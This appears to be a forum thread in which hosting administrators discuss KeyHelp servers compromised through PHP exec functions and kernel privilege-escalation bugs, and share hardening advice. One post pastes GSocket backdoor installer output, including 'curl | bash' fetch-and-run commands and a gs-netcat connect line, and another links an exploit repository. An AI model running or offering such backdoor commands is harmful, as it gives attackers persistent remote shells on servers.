Possible attack on Keyhelp panels

[theqkash]

It didn't have blank password. It's an attack, one of several ones, published last days. It allows any user in system to escalate privileges to root account, and then things like this are in logs. It is not a normal situation, but related to some actual security issue in kernel.

[omexlu]

@24unix the code is harmful, php and ssh, also the attacker installed GSocket.

The logs you shared show that a Global Socket (GSocket) backdoor has been installed on your server. Even if you believe there was no "SSH access," this tool provides the attacker with a permanent, interactive reverse shell that is even more dangerous than a standard SSH breach.

[24unix]

@24unix the code is harmful, php and ssh, also the attacker installed GSocket.

I said it is simple, not harmless.

[Eoler]

It didn't have blank password. It's an attack, one of several ones, published last days. It allows any user in system to escalate privileges to root account, and then things like this are in logs. It is not a normal situation, but related to some actual security issue in kernel.

Yes, they are all LPEs if user with shell access is compromised:
https://copy.fail/
https://ubuntu.com/blog/dirty-frag-linu ... -available
https://tuxcare.com/blog/fragnesia-cve- ... ernel-lpe/

[omexlu]

So how do we actually prevent that? My users don't have SSH access.

[theqkash]

Once again, it doesn’t require ssh. You have to disable functions on php config of your sites to block possibility of running software, eg. exec, system, shell_exec, passthru

My users also didn’t had any ssh, but because user within php was able to run some software on functions like provided above, they was able to get out of their user context and work as root.

[theqkash]

Yes, they are all LPEs if user with shell access is compromised:

The issue is, you don't need to give user SSH access. User needs just shell_exec or stuff and this is it.

Weird times...

[Eoler]

The issue is, you don't need to give user SSH access. User needs just shell_exec or stuff and this is it.
Weird times...

Yes, that's why I wrote "shell" and not "SSH"...
Look at this beauty - weird times indeed: https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn

[Ralph]

In most cases ... the PHP function "fopen()" are used as an entry point for hacking outdated PHP applications (CMS).

[superjogi]

Let us think about this for a moment.

So are you saying a client website was hacked and because the server was not patched with the recent rights escalation vulnerabilities it escalated to the server?

Or are you saying they hacked the panel directly similar to Wordpress?

Because these are 2 things.

Wordpress hacks I know and had occationally and cleaned them up.
I also saw that isolation of accounts is great.

[kurgans]

Yes... exactly as you're seeing, due to a Prestashop bug and the combination of enabled PHP functions, it was possible to download and execute a shell that bypasses all kernel controls.

Gaining unrestricted access to the entire environment

-> WARNING: Using existing secret from '/home/users/dominio-com//.config/htop/defunct.dat'
--> Trying x86_64-alpine
Downloading binaries........................................................ [OK]
Unpacking binaries.......................................................... [OK]
Copying binaries............................................................ [OK]
Testing binaries............................................................ [OK]
Testing Global Socket Relay Network.....................................[FAILED]
--> Secret ‘fcc’ is already used.
--> To uninstall, use GS_UNDO=1 bash -c “$(curl -fsSL https:)”
--> To connect, use one of the following:
--> gs-netcat -s “abc” -i
--> S="tzh" bash -c “$(curl -fsSL https:)”
--> S="abg" bash -c “$(wget -qO- https:)”

We were very lucky that Zabbix detected the problem and the tampering, issuing an alert, and the attacker only had time to install the shell

GS_UNDO=1 bash -c “$(curl -fsSL https://)”

and we were able to trace where it went and which files it included as root

s2

[superjogi]

The information is useful.
You are hotlinking the virus.

How did you use Zabbix? Is it installed on each server, or is it a cloudinstance that used the other servers?
How did you mitigate the problem on the server? Delete the shell or were there new users?

[Henning]

I'm following this thread very closely. It doesn't make me nervous, but I'd appreciate it if there could be some general information on whether, as an administrator, there's anything I can or need to do.

[Tobi]

The best protection against this kind of attacks is:
1. Do not use outdated software
2. Allow only the PHP functions you need
3. Ensure hardest isolation of user accounts using KeyHelp Pro and SSH Chail

[Tobi]

@kurgans
Please do not post links to malware!
Always anonymize such content!
Thanks for your cooperation!